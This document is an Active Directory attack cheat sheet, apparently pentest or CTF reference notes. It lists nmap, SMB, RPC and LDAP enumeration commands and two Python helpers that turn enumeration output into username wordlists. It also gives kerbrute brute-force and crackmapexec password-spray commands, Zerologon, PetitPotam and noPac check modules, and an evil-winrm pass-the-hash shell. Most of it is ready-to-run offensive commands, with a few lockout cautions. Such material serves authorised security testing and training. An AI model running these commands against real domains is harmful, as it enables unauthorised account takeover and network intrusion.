AD Enumeration
Port scanning
nmap -A -p- -T3 --open -vvv -Pn <IP> -oN <output_file> - Full TCP port scan with service and version detection; -Pn skips host discovery, since many domain controllers drop ICMP.
Ports of interest on a domain controller: 88 (Kerberos), 139 and 445 (SMB), 389/636 (LDAP/LDAPS) and 5985 (WinRM). Kerberos on 88 is the clearest sign that the host is a DC.
SMB Enumeration
smbclient -N //<IP>/<share> -c 'recurse; ls' - Fast recursive listing of a share over a null session (the smbclient command is recurse, not recursive; -N suppresses the password prompt)
smbmap -H <IP> -u '' -p '' - List shares and their permissions over a null session (smbmap takes lowercase -u/-p)
RPC Enumeration
rpcclient -U '' -N <IP> - Null session, no password
rpcclient -U '<user>%<password>' <IP> - Authenticated session; rpcclient takes user and password in one -U argument (-P is the machine-account flag, not a password)
enumdomusers - List all domain users with their RIDs (output lines look like user:[name] rid:[0x...])
querygroupmem 0x200 - List members of the group with RID 0x200 (512, Domain Admins); RIDs are given in hex
queryuser 0x1f4 - Show account details for RID 0x1f4 (500, the built-in Administrator); any RID returned by enumdomusers works here
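The enumdomusers output is what the two subcommands above feed on. The following is an added example, not part of the original cheat sheet: it parses a constructed sample of that output, converts the hex RIDs to decimal so the well-known accounts stand out, and builds the queryuser commands plus a bare username list for the Kerberos section below. The sample output and the helper names are my own.

```python
import re

# Constructed sample of `rpcclient -U '' -N <IP> -c enumdomusers` output
# (not a real capture); the real format is user:[<name>] rid:[<hex rid>].
SAMPLE_ENUMDOMUSERS = """\
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[sqlservice] rid:[0x452]
user:[j.doe] rid:[0x453]
"""

# Well-known RIDs that exist in every domain; anything >= 1000 was created later.
WELL_KNOWN_USER_RIDS = {500: "built-in Administrator", 501: "Guest", 502: "krbtgt"}
WELL_KNOWN_GROUP_RIDS = {512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}

USER_LINE = re.compile(r"user:\[(?P<name>[^\]]*)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")


def parse_enumdomusers(text):
    """Return [(name, rid_as_int), ...] from enumdomusers output, skipping any other lines."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.search(line)
        if m:
            users.append((m.group("name"), int(m.group("rid"), 16)))
    return users


def describe_rid(rid):
    """Label a user RID: well-known account, other built-in (< 1000), or created account."""
    if rid in WELL_KNOWN_USER_RIDS:
        return WELL_KNOWN_USER_RIDS[rid]
    return "created account" if rid >= 1000 else "other built-in"


def queryuser_commands(users):
    """rpcclient subcommands that fetch each account's details (hex RID, as rpcclient expects)."""
    return ["queryuser 0x%x" % rid for _, rid in users]


def kerbrute_wordlist(users):
    """Bare usernames, one per line, in the shape kerbrute userenum and password sprays take."""
    return "".join(name + "\n" for name, _ in users)


if __name__ == "__main__":
    users = parse_enumdomusers(SAMPLE_ENUMDOMUSERS)
    for name, rid in users:
        print("%-16s rid=%-5d (0x%x) %s" % (name, rid, rid, describe_rid(rid)))
    print("\n".join(queryuser_commands(users)))
    print("querygroupmem 0x%x  # %s" % (512, WELL_KNOWN_GROUP_RIDS[512]))
```

Feed the generated queryuser lines back with rpcclient -c, one per call or joined with semicolons, and write the wordlist to a file for kerbrute userenum.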
LDAP Enumeration
Using ldapsearch and ldapdomaindump
ldapsearch -H ldap://<IP> -x -s base -b '' namingContexts - Anonymous rootDSE query; returns the naming contexts (e.g. DC=tld,DC=local) to use as the base DN below
ldapsearch -H ldap://<IP> -x -b 'DC=tld,DC=local' '(objectClass=user)' sAMAccountName | grep sAMAccountName - Dump account names (-s needs a scope argument, so it is dropped here and defaults to sub). AD normally refuses anonymous reads of the domain partition, so if this returns nothing add -D '<user>@tld.local' -w '<password>'
ldapdomaindump -u 'domain.local\user' -p 'password123' <IP> - Dump users, groups, computers and policy to HTML, JSON and grep-able files (the installed command is ldapdomaindump; ldapdomaindump.py when run from source)
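Piping ldapsearch into grep is fragile: ldapsearch base64-encodes any value with non-ASCII bytes (attr:: ...) and folds lines longer than 76 columns with a leading space, so grep prints encoded values and loses continuations. The following is an added example, not part of the original notes, that parses the LDIF output properly and shows what grep would have returned instead. The sample LDIF is constructed and the function names are my own.

```python
import base64

# Constructed ldapsearch LDIF output (not a real capture). It contains the two
# cases `grep sAMAccountName` mishandles: a base64 value (attr:: ...) for a name
# with a non-ASCII character, and a dn folded onto a second line with a leading
# space, which ldapsearch does to any line past 76 columns.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=tld,DC=local> with scope subtree
# filter: (objectClass=user)
# requesting: sAMAccountName

# John Doe, Users, tld.local
dn: CN=John Doe,CN=Users,DC=tld,DC=local
sAMAccountName: j.doe

# Test User, Users, tld.local
dn: CN=Test User,CN=Users,DC=tld,DC=local
sAMAccountName:: dMOpc3QudXNlcg==

# SQL Service Account, Service Accounts, Corp, tld.local
dn: CN=SQL Service Account,OU=Service Accounts,OU=Corp,DC=tld,DC=loc
 al
sAMAccountName: sqlservice

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3
"""


def parse_ldif(text):
    """Parse ldapsearch output into [{'dn': ..., 'attrs': {name: [values]}}, ...]."""
    # Step 1: unfold. A line beginning with one space continues the previous line.
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    # Step 2: split on blank lines into entries and decode base64 ("::") values.
    entries, current = [], None
    for line in unfolded:
        if not line.strip():
            if current is not None:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        elif value.startswith("<"):
            value = value[1:].strip()  # attr:< URL reference; keep the URL as-is
        else:
            value = value.strip()
        if attr == "dn":
            current = {"dn": value, "attrs": {}}
        elif current is not None:  # trailer lines (search:, result:) have no dn and are dropped
            current["attrs"].setdefault(attr, []).append(value)
    if current is not None:
        entries.append(current)
    return entries


def sam_account_names(text):
    """Every decoded sAMAccountName in the output, sorted, ready for a wordlist."""
    names = []
    for entry in parse_ldif(text):
        names.extend(entry["attrs"].get("sAMAccountName", []))
    return sorted(names)


def grep_sam_account_name(text):
    """What `grep sAMAccountName` prints: raw lines, encoded values and comments included."""
    return [line for line in text.splitlines() if "sAMAccountName" in line]


if __name__ == "__main__":
    print("grep would give:", grep_sam_account_name(SAMPLE_LDIF))
    print("parsed:         ", sam_account_names(SAMPLE_LDIF))
```

The same parser works on the raw ldapsearch output for any attribute set; swap sAMAccountName for servicePrincipalName to pull SPNs out of a '(servicePrincipalName=*)' query.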
Kerberos
kerbrute userenum --dc <DC-hostname-or-IP> -d <domain.local> <path-to-user-wordlist> - Validate usernames via Kerberos pre-auth errors; no credentials needed and no password is tried, so it does not cause lockouts
kerbrute bruteuser --dc <DC-hostname-or-IP> -d <domain.local> rockyou.txt sqlservice - Password brute force against a single account; every failed attempt counts towards the lockout threshold, so read the password policy first (--pass-pol below)
Kerberoasting
Crackmapexec
crackmapexec smb targets.txt -u users.txt -p passwords.txt - Password spray: every user against every password, stopping at the first valid pair per host
crackmapexec smb targets.txt -u users.txt -p passwords.txt --continue-on-success - Same, but keep going after a hit to collect every working credential
crackmapexec smb 192.168.1.0/24 -u username -p 'password' --pass-pol - Dump the domain password policy (lockout threshold and window); check this before any spray
crackmapexec smb 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce - Pair line N of the user file with line N of the password file instead of trying every combination
crackmapexec smb <ip> -u '' -p '' -M zerologon - Zerologon (CVE-2020-1472) vulnerability check; the module name is zerologon
crackmapexec smb <ip> -u '' -p '' -M petitpotam - PetitPotam check
crackmapexec smb <ip> -u 'user' -p 'pass' -M nopac - NoPac (CVE-2021-42278/42287) check; this one needs valid domain credentials
Evil-Winrm
evil-winrm -i <IP> -u 'user' -p 'password' - PowerShell remoting shell over WinRM (TCP 5985, or 5986 with -S for SSL); use -H <NTLM-hash> instead of -p for pass-the-hash